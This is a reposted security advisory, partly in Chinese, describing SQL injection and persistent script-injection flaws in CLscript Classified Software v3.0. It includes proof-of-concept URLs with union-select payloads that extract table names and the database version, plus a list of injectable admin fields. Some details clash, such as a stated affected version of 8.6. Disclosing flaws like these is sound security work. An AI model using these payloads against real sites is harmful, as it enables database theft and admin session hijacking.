CLscript CMS v3.0多重缺陷的介绍及其修复方法
CLscript CMS v3.0 - Multiple Web Vulnerabilities <br />缺陷影响版本:8.6 <br />程序介绍: <br />============= <br />With the professionally developed Classified-Portal CLscript 3.0 can Visitors post Classifieds and <br />use many new Features. The Classifieds Software is search Engine friendly to gain better Promotion <br />Aspects at search Engines. The whole Structure is manageable through easy to use AdminPanel. <br />In developing the Classified Software, we have geared ourselves to the most successful <br />Classifieds-Sites on the Internet. You can generate real Income from your Classifieds Website. <br />更多请查看官网 <br />摘要 <br />========= <br />CLscript v3.0 Content Management System中被发现多个缺陷 <br />影响产品: <br />================== <br />CLscript COM <br />Product: CLscript Classified Software v3.0 <br />技术分析: <br />======== <br />1.1 <br />多个注射 <br />The vulnerability allows an attacker (remote) to inject/execute own sql commands on the affected <br />application dbms. The vulnerabilities are located in the userDetail.php, advertise_detail.php or <br />land.php files with the bound vulnerable pid, rid and id parameters. Successful exploitation of the <br />vulnerability results in dbms, service & application compromise. <br />Vulnerable File(s): <br />[+] userDetail.php <br />[+] advertise_detail.php <br />[+] land.php <br />Vulnerable Module(s): <br />[+] land <br />[+] pageDetail <br />[+] enquiry_detail <br />[+] userDetail <br />[+] advertise_detail <br />[+] config_id <br />Vulnerable Module(s): <br />[+] rID <br />[+] ID <br />[+] pID <br />[+] faq_id <br />[+] sp_id <br />[+] config_id <br />1.2 <br />Multiple persistent input validation vulnerabilities are detected in the CLscript v3.0 Content Management System. <br />The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent). <br />The input validation vulnerabilities are located in the topic, new word, subcategories, add a new help, add currency <br />or add new FAQs modules. Remote attackers can inject script code to the vulnerable modules by injecting malicious <br />tags as titles, descriptions, word names, category names, currency code or as questions. Successful exploitation <br />of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation. <br />Exploitation requires low user inter action & privileged user account. <br />Vulnerable Module(s): <br />[+] Topic <br />[+] New word <br />[+] Subcategory <br />[+] Add a new help <br />[+] Add currency (Symbol - Currency code) <br />[+] Add new FAQ (Question) <br />Vulnerable Parameter(s): <br />[+] (title - description) <br />[+] (word name) <br />[+] (category name) <br />[+] (name) <br />[+] (symbol - currency code) <br />[+] (question) <br />测试证明: <br />================= <br />The sql injection vulnerabilities can be exploited by remote attackers without privileged user accounts or user inter action. <br />For demonstration or reproduce ... <br />PoC: <br />http:// //land.php?file=edit_config&config_id=1'+order+by+1--%20- <br />http://n1.127.0.0.1:1338//land.php?file=edit_config&config_id=-1'+union+select+1, <br />group_concat(table_name),3+from+information_schema.tables+where+table_schema=database()--%20- <br />http://n1.127.0.0.1:1338//pageDetail.php?pid=-1'+union+select+1,version(),3,4,5,6,7--%20- <br />http://n1.127.0.0.1:1338//land.php?file=edit_diycontent&pid=5' <br />http://n1.127.0.0.1:1338//enquiry_detail.php?rID=-20'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--%20- <br />http://n1.127.0.0.1:1338//land.php?file=add_edit_spam_words&sp_id=45' <br />http:// //land.php?file=catalog&parentId=608 <br />http://n1.127.0.0.1:1338//userDetail.php?id=487 <br />http://n1.127.0.0.1:1338//advertise_detail.php?id=77 <br />http://n1.127.0.0.1:1338//land.php?file=edit_faq&faq_id=24 <br />1.2 <br />The persistent input validation vulnerabilities can be exploited by remote attackers with local low privileged user accounts and <br />with low required user inter action. For demonstration or reproduce ... <br />PoC: <br />1) http://n1.127.0.0.1:1338//land.php?file=manage_forum <br />create topic (title - description is injectable) <br />2) <br />http://n1.127.0.0.1:1338//land.php?file=manage_spam_words - <br />add a new word (word is injectable) <br />3) <br />http://n1.127.0.0.1:1338//land.php?file=catalog&parentId=608 - <br />add subcategory (category name is injectable) <br />4) <br />http://n1.127.0.0.1:1338//land.php?file=manage_help - <br />add a new help <br />5) <br />http://n1.127.0.0.1:1338//land.php?file=manage_currencie <br />Add currency (Symbol - Currency code is injectable) <br />6) <br />http://n1.127.0.0.1:1338//land.php?file=manage_faq <br />add new FAQ (Question is injectable) <br />风险 <br />===== <br />1.1 <br />The security risk of the sql injection vulnerabilities are estimated as critical. <br />1.2 <br />The security risk of the persistent input validation vulnerabilities are estimated as medium(+). <br />-- <br />VULNERABILITY RESEARCH LABORATORY TEAM <br />Website: www.vulnerability-lab.com <br />Mail: research@vulnerability-lab.com
頁:
[1]